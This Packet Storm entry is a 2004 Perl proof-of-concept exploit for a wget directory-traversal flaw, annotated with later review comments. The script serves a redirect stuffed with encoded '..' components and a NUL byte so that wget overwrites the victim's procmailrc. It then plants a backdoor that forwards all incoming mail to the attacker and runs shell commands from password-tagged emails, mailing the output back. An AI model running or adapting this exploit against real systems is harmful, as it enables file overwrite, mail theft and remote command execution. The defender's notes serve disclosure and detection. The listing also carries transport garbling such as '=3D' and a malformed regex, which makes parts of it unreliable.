wgettrap.txt

2004-12-30T00:00:00
ID PACKETSTORM:35365
Type packetstorm
Reporter Jan Minar
Modified 2004-12-30T00:00:00

Description

                                        
                                            `#!/usr/bin/perl -W  
# wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability  
#  
# Copyright 2004 Jan Minář (jjminar fastmail fm)  
# License: Public Domain - SECU  
#  
# When wget connects to us, we send it a HTTP redirect constructed so that,  
# when wget follows it and connects a second time, it is attempting to  
# overwrite ~/.procm4ilrc (well, provided that the user running wget has  
# username 'jan' 8-)).  
#
# NOTE(review): the listing is kept exactly as posted. It carries
# quoted-printable transport artefacts ("=3D" where the source had "=",
# "=20" for a trailing space) and has no "use strict", so it is not
# runnable verbatim; it is a reference for the vulnerability class.
#
# Defender's summary: this is a one-shot HTTP responder. It reads a single
# request from STDIN, writes a single response to STDOUT and exits, so it is
# presumably meant to run under a socket wrapper such as inetd -- nothing
# here opens a listening socket. The detection signal is the redirect it
# emits: a Location: header whose path is dozens of URL-encoded ".."
# components ("%2f..") followed by a "%00". A client that decodes that path
# before deriving the local output filename writes outside its download
# directory; the client-side mitigation is to refuse or sanitise redirect
# targets containing encoded traversal components.
  
use POSIX qw(strftime);   # strftime() builds the Date: header below  
  
# This is our scheme/host/port -- the base of the Location: we redirect to  
$server =3D "http://localhost:31340";  
# Use this + DNS poisoning with wget 1.9 & CVS  
#$server =3D "http://..";  
  
# Wanna know who got infected?  
# (optional log destination; when unset, all "if $log" branches are skipped)  
#$log =3D "/dev/pts/1";  
  
# The filename we will try to overwrite on the target system.  
# The "%00" is an encoded NUL; the author's own text after it says the rest is  
# ignored -- presumably the decoded NUL truncates the path on the client side.  
$filename =3D "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";  
  
############### Payload #########################################  
# Content written into the target's procmailrc: two recipes. The first (":0c")  
# copies every incoming message to $email; the second runs a shell over any  
# message carrying the two X-Wgettrap-* headers (the "backdoor" the comments  
# below refer to). $email and $password are interpolated into the here-doc.  
$email =3D 'your@mailbox';  
$password =3D 'Pmrpuf ner cevzvgvirf';  
$payload =3D <<EOP;  
:0c  
| mail -s 'Wgettrap mail copy' $email  
:0  
* ^X-Wgettrap-Command: shell  
* ^X-Wgettrap-Password: $password  
| /bin/sh -c '/bin/sh | mail -s "Wgettrap shell output" $email'  
EOP  
chomp $payload;   # drop the here-doc's trailing newline  
############### Payload #########################################  
  
# A simple directory traversal, for greater effect: "/.." followed by 40  
# URL-encoded "/.." components (encoded presumably so the client does not  
# collapse them before it decodes the path)  
$trick =3D "/.." . "%2f.." x 40;  
  
# Optional request log. NOTE(review): bareword handle, 2-arg open, result  
# unchecked; the safe idiom is open(my $log_fh, '>', $log) or die "$!".  
open LOG, ">$log" if $log;  
  
# Handle exactly one HTTP request, read line by line from STDIN.  
while(<STDIN>){  
print LOG $_ if $log;   # echo every request line to the log, if enabled  
# First visit: the request line is for whatever URL the victim asked for.  
# Second visit: it carries the traversal path we redirected to.  
if (/\Q$trick$filename\E/) {  
#if (/%2f/) {  
# We see the filename, so this is the second time  
# they're here. Time to feed the sploit.  
$second++;  
} elsif (/^Range: bytes=3D\(33\)-/) {  
# NOTE(review): as posted the parens are escaped, so this pattern has no  
# capture group and the $1 printed below is undef -- the intended pattern was  
# presumably a capture of the byte offset. Garbled in transport, most likely.  
# The ten-step plan below describes a resumable-download (wget -c) scheme  
# that this version does NOT implement: the branch only writes a log line.  
# Appending goes like this:  
# (1) Tell'em what you're gonna tell'em  
# (2) Then tell'em just a half  
# (3) Close it  
# (4) Wait  
# (5) They're comin' back, with wget -c  
# (6) Tell'em the sploit  
# (7) Close again  
# (8) Wtf? They're comin' back with wget -c again  
# (9) Tell'em the rest...  
# (10) ... enjoying the backdoor at the same time  
# ("if" in the message is a typo for "is"; left as posted)  
print LOG "File if $1 bytes long\n" if $log;  
} elsif (/^\r?$/) {  
# The HTTP headers are over. Let's do it!  
# NOTE(review): an HTTP Date: should be in GMT; localtime + %z yields a local  
# offset instead. Harmless for the PoC, but not a conforming header.  
$date =3D strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);  
if (!$second) {  
# First visit: answer with a 301 whose Location: is $server$trick$filename,  
# i.e. the traversal path. (The original "payload"/"redirection" comments on  
# these two branches were swapped; corrected here.)  
print <<EOT;  
HTTP/1.1 301 Moved Permanently\r  
Date: $date\r  
Server: wgettrap 1.1\r  
Accept-Ranges: bytes\r  
Location: $server$trick$filename\r  
Content-Length: 43\r  
Connection: close\r  
Content-Type: text/html\r  
\r  
<html><head><title></title></head></html>\r  
EOT  
} else {  
# Second visit: serve the procmailrc content as a plain-text 200.  
print <<EOT;  
HTTP/1.1 200 OK\r  
Date: $date\r  
Server: wgettrap 1.1\r  
Accept-Ranges: bytes\r  
Content-Length: 25\r  
Connection: close\r  
Content-Type: text/plain\r  
\r  
$payload  
EOT  
}  
# One request per process: respond, then quit.  
exit 0;  
}  
}  
`